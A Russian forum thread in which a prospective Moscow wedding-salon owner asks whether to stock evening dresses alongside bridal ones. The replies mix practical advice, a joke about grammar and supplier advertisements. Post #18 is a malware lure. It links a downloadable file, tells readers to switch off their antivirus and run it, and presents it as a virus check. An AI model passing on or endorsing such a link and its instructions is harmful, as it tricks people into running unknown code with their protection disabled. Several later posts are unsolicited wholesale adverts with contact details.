Гость
Статьи
Свадебный салон

Свадебный салон

Доброго всем дня. Дорогие форумчане, помогите определиться. Просьба обращаться только тем, кто уже сам имел опыт открытия.Предмет обсуждения: Открываем свадебный салон в Москве. Не можем определиться, продавать только свадебные платья, аксессуары и перчатки с фатами. Или для ассортимента: вечерние платья ещё приобрести. Площадь небольшая 35 кв.м. ПОМОГИТЕ. Определиться. И кто знает, где их можно приобрести(чтобы соответствовали моде и не портили мнение о свадебном салоне)

Красотка
21 ответ
Последний — Перейти
Гость
#1

главное не написать слово "фатами"на вывеске,тогда и мнение не испортите!

табуретка
#2
Гость

главное не написать слово "фатами"на вывеске,тогда и мнение не испортите!

а действиетльно, как будет мн.ч. от "фата"? ))

Стерлядь
#3

Скажите, пожалуйста, как склоняется слово 'фата' во множественном числе.

Спасибо заранее.

AMV

Ответ справочной службы русского языка

Форма родительного падежа мн. числа существительного фата неупотребительна. Остальные формы: фаты, фатам, фаты ,фатами, о фатах.

Гость
#4

Конечно продавайте! Но предлагайте их как платья для подружек невесты :) Этого ой как не хватает везде. И конечно лучше чтобы они по стилю подходили к свадьбе, попробуйте поискать дизайнера какого-нибудь молодого, он вам поможет с этим.

А так между делом можно как выпускные продавать, или просто как нарядные платья.

Гость
#5

фаты и фатами звучит реально не очень

Красотка
#6
табуретка

а действиетльно, как будет мн.ч. от "фата"? ))

Мы не собираемся писать ассортимент на фасаде или ещё где. Просто муж боиться, что если много будет всего, то будет похоже на базар. Я настаиваю... что ассортимент рождает спрос

соучастнег автора
#7

уточню в чем у нас разногласия

то что хорошо бы еще продавать вечерние платья никто не спорит. Но у нас довольно маленькая площадь, да и денег на закупку тоже не бесконечно. Поэтому вопрос стоит так - если мы закупаем/выставляем вечерние платья, то при этом уменьшается ассортимент свадебных!

т.е. сейчас мы закупаем допустим 50 свадебных платьев. Если решим продавать вечерние, то закупим где-то 40 свадебных и 15 вечерних.Ассортимент уменьшается на 20%!

Гость
#8

Можно в каталоге напечатать и привозить их на заказ, т.е. в салоне не держать.

Красотка
#9
Гость

Можно в каталоге напечатать и привозить их на заказ, т.е. в салоне не держать.

А как же быть с теми, кто хочет на свадьбу идти через 3 дня... Например: Невеста купила у нас свадебный наряд, а подруга невесты ещё не приобрела и хотела бы тоже сразу купить??? Как тогда быть. И примерить тоже стоит, так как фигуры у всех нас разные(индивидуальные)

Гость
#10

у нас нет вечерки, лучше уж больше выбор свадебный. Как говорится не гонитесь за зайцами)))

Красотка
#11
Гость

у нас нет вечерки, лучше уж больше выбор свадебный. Как говорится не гонитесь за зайцами)))

Просьба подписывайтесь именами, чтобы знать к кому обращаться. За зайцами не гоняемся. Хочется всё для удобства. А по ответу кажется, что Вы Мужчина или ещё не вышли замуж Женщина. Я была невестой и когда стала собираться замуж - очень много забот навалилось, а хотелось времени по-меньше трать на всё. Вот поэтому я понимаю будущих невест. А те кто ещё не собираются или Мужчины - нет.

Красотка
#12
Гость

у нас нет вечерки, лучше уж больше выбор свадебный. Как говорится не гонитесь за зайцами)))

А Вы с какого города и какова у Вас площадь? И только свадебные платья и ВСЁ?

Фея с топором
#13

на мой взгляд, можно и без вечерних платьем, лучше увеличить объем свадебных аксессуаров. По скольку время не у всех есть бегать то за одним, то за другим по магазинам. Я вот, например, при подготовке к свадьбе столкнулась с тем, что платьев в салонах много, а вот всего остального 5-6 наименований (перчатки, сумочки, бокалы, обложки под свидетельство, накидки, приглашения, сумочки и т.д.). Приходилось искать все в разных местах, честно говоря, очень неудобно, по скольку рабочий график очень плотный и физически все не успевала. А поручать кому-то не люблю.

Гость
#14

Не знаю где спросить, поэтому прошу здесь дайте кто нибудь ссылку на форум владельцев св. салонов Миланы не могу найти, можно на iodsh@yandex.ru

Красотка
#15
Гость

Не знаю где спросить, поэтому прошу здесь дайте кто нибудь ссылку на форум владельцев св. салонов Миланы не могу найти, можно на iodsh@yandex.ru

А что именно Вам надо? Зачем Вам владельцы?

КАТРИН
#17

Покупала платье в салоне Lady in white))) Рада безумно)) Платье офигенное!!! Свадьба прошла на ура! Продавцы очень профессионально относятся к своей работе, уютное местечко, домашняя обстановка. А главное болшой выбор платьев на любой вкус и кошелек!!!

проверь
#18

"http:\/\/rghost.ru\/46755207 и так.\n
Качаем, отключаем антивирус( дабы базы антивирусной программы, не сталкнулись с базой вашего антивируса) запускаем с выключеным антивирусом, ждет минуту.\n
И смотрим сколько вирусов на вашем компьютере."

Катя
#19

Платья от производителя по доступным ценам, авторский дизайн, свое производство. Крупный поставщик по России, Украине и странам СНГ.Больше информации на нашем сайте - olga-tkach.com, по вопросам потенциального сотрудничества просьба обращаться на электронную почту - sales@olga-tkach@.com

Татьяна
#20

ТОЛЬКО ОПТ!!!
СВАДЕБНЫЕ ПЛАТЬЯ от 1 500 рублей до 75 000 рублей. (В наличии более 30 000 моделей).
ВЕЧЕРНИЕ И ВЫПУСКНЫЕ ПЛАТЬЯ от 1500 рублей.
ДЕТСКИЕ ПЛАТЬЯ от 600 рублей.
СВАДЕБНЫЕ АКСЕССУАРЫ : ФАТЫ, ПЕРЧАТКИ, ШУБКИ, НАКИДКИ, БАЛЕРО.
СВАДЕБНАЯ БИЖУТЕРИЯ : ДИАДЕМЫ, КОЛЬЕ, ШПИЛЬКИ, УКРАШЕНИЯ В ПРИЧЕСКУ И ТД.
АКСЕССУАРЫ РУЧНОЙ РАБОТЫ : ФУЖЕРЫ, СВЕЧИ " СЕМЕЙНЫЙ ОЧАГ", ПОДУШЕЧКИ ДЛЯ КОЛЕЦ, ПОДВЯЗКИ, СУНДУЧКИ ДЛЯ ДЕНЕГ, БУКЕТЫ, УКРАШЕНИЯ НА АВТОМОБИЛИ И МНОГОЕ ДРУГОЕ.
КРИНОЛИНЫ ( СОБСТВЕННОЕ ПРОИЗВОДСТВО)
ЧЕХЛЫ ПО 90 РУБЛЕЙ ( СОБСТВЕННОЕ ПРОИЗВОДСТВО).
ТОРГОВОЕ ОБОРУДОВАНИЕ ( МАНЕКЕНЫ ПО 450 РУБЛЕЙ, СТОЙКИ, ВЕШАЛКИ).

НАПИШИТЕ КАК С ВАМИ СВЯЗАТЬСЯ, МЫ ВАМ ОБЯЗАТЕЛЬНО ПЕРЕЗВОНИМ.

У НАС ЕСТЬ !ВСЕ! ДЛЯ ОТКРЫТИЯ СВАДЕБНОГО САЛОНА.

Контактный телефон:
8- 963-092-26-76 ТАТЬЯНА.
E-mail: tatyana.almazz@mail.ru
http://vk.com/club59575217 ( ЗДЕСЬ ВЫ МОЖЕТЕ ПОСМОТРЕТЬ МОДЕЛИ)

С уважением, Татьяна.

Kristina
#21

Каталог производителей ComeChu - это специальный проект созданный для налаживания контактов между Российскими предпренимателями в свадебной индустрии и китайскими владельцами заводов и фабрик! Свадебные и вечерние платья в наличии, пошив платьев по фото клиента, ткани, кружева и аксессуары - все это можно приобрести напрямую из Китая! Фото платьев только в живую https://vk.com/comechu Whatsapp +8618662609228

Форум: Семья
Всего:
Новые темы за сутки:
Популярные темы за сутки: